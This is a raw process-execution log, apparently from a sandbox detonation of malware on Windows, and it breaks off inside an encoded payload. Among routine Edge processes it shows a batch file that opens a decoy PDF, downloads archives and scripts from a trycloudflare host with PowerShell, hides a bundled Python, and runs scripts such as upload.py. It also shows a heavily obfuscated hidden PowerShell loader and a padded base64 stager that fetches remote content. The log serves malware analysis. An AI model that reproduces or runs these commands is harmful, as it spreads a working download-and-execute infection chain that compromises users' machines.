"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1284 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4748 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe c:\Users\Admin\Downloads\new.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\new.bat""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://flu-survival-educational-nba.trycloudflare.com/kbsfaw.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5228 /prefetch:6

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6888 /prefetch:8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)

C:\Windows\system32\attrib.exe

attrib +h "C:\Users\Admin\Downloads\Python"

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe money.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe moment.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe update.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe upload.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe time.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe kam.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Users\Admin\Downloads\Python\Python312\python.exe

python.exe momentomo.py

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://flu-survival-educational-nba.trycloudflare.com/kbsfaw.pdf

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe1cc83cb8,0x7ffe1cc83cc8,0x7ffe1cc83cd8

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,17429188085956929424,5938882748271905795,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://flu-survival-educational-nba.trycloudflare.com/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dvfhxj.vbe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\glbdqn.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\jrzlfk.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmwjze.cmd" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Ordovian Talgsmelteris Klevarers Eurokous Accouterments Dimanganous Filao Inflectionally Brdgruppernes Riotise';$Mo = 1;Function Befaret($Kuldkaste){$Boghvedegrynenes=$Kuldkaste.Length-$Mo;$Fogramite101='SUBSTRIN';$Fogramite101+='G';For( $Stemningernes=2;$Stemningernes -lt $Boghvedegrynenes;$Stemningernes+=3){$Ordovian+=$Kuldkaste.$Fogramite101.Invoke( $Stemningernes, $Mo);}$Ordovian;}function Skriverkontor($Foresight){ & ($Advarselssignaler) ($Foresight);}$Ekspansionsbeholder=Befaret 'RaMSnoPez ii,al.ilMea S/ i5A...k0In O ( OW ,iU.nefd .oKuwStsFo EN tT . Ob1So0,a.Rk0S ;.o ,cWU.iCin A6Ch4 e;St FoxS,6Ma4D,; A mrChvSu:.o1I 2Sw1Uo.Li0Im)T, .GCae FcDikA,o B/ L2,u0O.1Wa0bu0Zi1Fe0,n1.r BF TiR rCie ,f,eoKox S/Ov1Sn2tr1Tr.w 0St ';$Fredspibers=Befaret ',lUCas BeSkru -M.ATrgEke.vnLstSk ';$Accouterments=Befaret 'AuhRetLutLopAusBe: B/ e/.unU.z OaInrReigra,o.P.oOerTagCi/Syt sr e/ .tPor UeS.l,yeAnm,deKnn.etreeMor ...epGrsTomFy ';$Overgenialness=Befaret 'De>He ';$Advarselssignaler=Befaret 'Tri Ae ixS, ';$Camuse='Inflectionally';$Administrationsbygningen = Befaret ',ieDecaehBoo U Cr%diaAtp.ap Md Sa tStaSy%S,\EpFUnaDev BuZes HeUnsFo1Sh4Py6S,.,kAS,a.urF Op&Re&An FoeYic h roC. EktKi ';Skriverkontor (Befaret 'Le$IlgNol AoEpbFiaHjlBk:UdFWieF rEpvfooE.u,lrT.lRke .s Us.e=Ps(frcM,mSndV, .e/ rc N E.$BeAPadF.m eiPrn aines it KrMuasktpli BoS.nKas,rbs,y ,g tnSiiUdnIngM eRanF.) M ');Skriverkontor (Befaret 'S $ FgAllBroApbJua,tlPe:S EDru,orKuo xkMioEvuFos y=mi$UnABacHyc.soDeuDatSteMarThmRaeAnnC.t.esRi. asL,pBelPaiPat.i(I.$BaO .vLeet.r hgR,eGen .iTia,alSnnine Cs s E)Sa ');Skriverkontor (Befaret ' P[I,NP.eFrtTi.m SApeunrNivCui ,cMye,nPSsod.i,dn DtHoMA.a,sn SaekgS,eF,r ] ,:F.:C,SGeePec,euPrr,niS tS,yEkP irBiolytIro AcHeo flSt .r= F [FoN SeSit U.VaSBieOvc BuPar i ,tEkyToPTrrDeoPotUboPhc No,ilVoT BySyp.eeA.]Sk:Di:.aTBelIdsHa1Ud2A, ');$Accouterments=$Eurokous[0];$Reattire= (Befaret 'Gu$Blg GlUnoF,b,naPulP,:F.AChd JdL eJur eiSunSigUne .nPes e= NSke UwPa- EOEpbU,jExe .cEntI, SpS DyHvs.dtCaeFim S.FoN mebatIo.,lWR,eUnbDiC .l SiFie UnUnt');$Reattire+=$Fervourless[1];Skriverkontor ($Reattire);Skriverkontor (Befaret ' P$MoADrdHedSyeCarudiGan DgK,eEnn Ps F.ArHSyeOdaUld eI r TsSn[Ep$PlFsor Pe rd lsSupBii.ubfoeRorChs,t] G=M $L E ,k ,sDrp.uaDinuns,aiAnoTenShsWob uePohDro ElFldS.eForSm ');$Nonreasoning131=Befaret 'Un$D.A DdNeddieCorLoi AnMig.peG.nTusOd. kD,oo iw,nnSylBroCoaApd DFD iFal eFe( ,$ SAR,c OcReoCouWitPreP.rIdm eB,n et SsM.,,i$ VI FmSpp Vr eoUdv RiOrs Ba etK,rS,i .cU eOp) F ';$Improvisatrice=$Fervourless[0];Skriverkontor (Befaret 'Ex$ g Pl.uoC,b saCalFo:KlG,arBua heA,nHes FeUdp.dr Io vSti .n,fsCh= p(AfT PeBusPot F-InPN.a At Sh,o Co$.eI,ymP.p .rUnoAsvHeiResA aArt rKoi cTeeSt)in ');while (!$Graenseprovins) {Skriverkontor (Befaret 'Co$UngKrl RoSubL.aUdl.k:NoFFoaScmOmiE,lSai .eR s C=sa$ChtInr SuMieAn ') ;Skriverkontor $Nonreasoning131;Skriverkontor (Befaret 'feS VtT aHerKltPl- BS,alV eS eI pPe .u4V, ');Skriverkontor (Befaret 'Fr$SkgHelscoShbKvaInlEb: ,Ga.rVeaLneStnA.s te PpmorAdoTovBei .nS.s M= A(HaT.ae Us,ltM -S.PBaaDetG h , P.$AfI ImBuph r o ovSmi us daRut OrSkiStc,ueMi)St ') ;Skriverkontor (Befaret ' .$ ,g lBuoRebS aStl I:.iKT loveD,v La .r ,eExr FsUn=Sm$Stgcal.hoVab aYmlNe:S TSaaFol ,gsesDamTie,clJ tIneMarMri RsA,+Da+ L%A $KoE muSkrdeoPek To .u,us O. oc eo ,u Vn ,tC, ') ;$Accouterments=$Eurokous[$Klevarers];}$Cinematographies=298843;$platyrhina=27531;Skriverkontor (Befaret 'M $ hg .l,eoSkbKia TlF,: eB er EdL gF,rPru.epStpFoe,vrF nKoeF.sAp T,=G. gGB,eDit p-klCEooAcnPrtKoe FnfatC. ,$ SISem,rpKar ro CvKuiCasSpa .t MrV iCocMae f ');Skriverkontor (Befaret 'Af$,yg.nlPsoDubBeaI.lBr:HeRClaubmTubPeuRetDiaStn.a Fl= L Bk[.yS UyTrs Ut,le .mGl.PuCNeoKyn,iv veS rGet e]V : N: IF.urSwos m mBLea rs .e C6 P4ScS BtW,r EiFonDhg S(K,$ pBDerytdUdg GrDeuN.pNipFoe rV,nGeeF sTh)Di ');Skriverkontor (Befaret 'Ho$PegOvlGeoGibTiaInlBa:hjS,otStyL nMaeAltBl1A.8op4Hj Fo= A S[ BS MyIns,at,eeRemIn.AuT AeInx Gt S. E,inIncBaoErdOpiChnReg ]Ep:Co: AG SSpC.rI.nII,.TiG .eSut,lSsktPlrIniThnGigKa(Gl$KuR vaRamFrb eu St Ca.on C)Gl ');Skriverkontor (Befaret 'P,$ .gHylT oAnbDea ,l l:Tav .a Bn,aaH,h ie SiFlmFu=Be$ArSCht Sy inLaeagt E1.i8 .4 E.Pesgnu b EsO,t,erE.i nC.g.e( T$LuC,liAtnHee TmDea HtU oWig rFoa epSchSkipseM.sOl,Br$Snp SlIra otDayCorRoh.ni,hn,naIn)fe ');Skriverkontor $vanaheim;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTreaQBhDgTreDgDgTreMDgTreDgTrezDgTreDQDgTreMDgTreDgTre1DgTreC4DgTredQBzDgTreC4DgTreYQByDgTreGMDgTreaDgTreBpDgTreHYDgTreZQDgTreuDgTreG8DgTrecgBnDgTreC8DgTreMQDgTre2DgTreC8DgTreaQB0DgTreGUDgTrebQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwDgTreyDgTreDDgTreDgTreMgDgTre0DgTreDDgTreDgTreNgDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTreaQBhDgTreDgDgTreMDgTreDgTrezDgTreDQDgTreMDgTreDgTre1DgTreC4DgTredQBzDgTreC4DgTreYQByDgTreGMDgTreaDgTreBpDgTreHYDgTreZQDgTreuDgTreG8DgTrecgBnDgTreC8DgTreMQDgTre2DgTreC8DgTreaQB0DgTreGUDgTrebQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwDgTreyDgTreDDgTreDgTreMgDgTre0DgTreDDgTreDgTreNgDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTr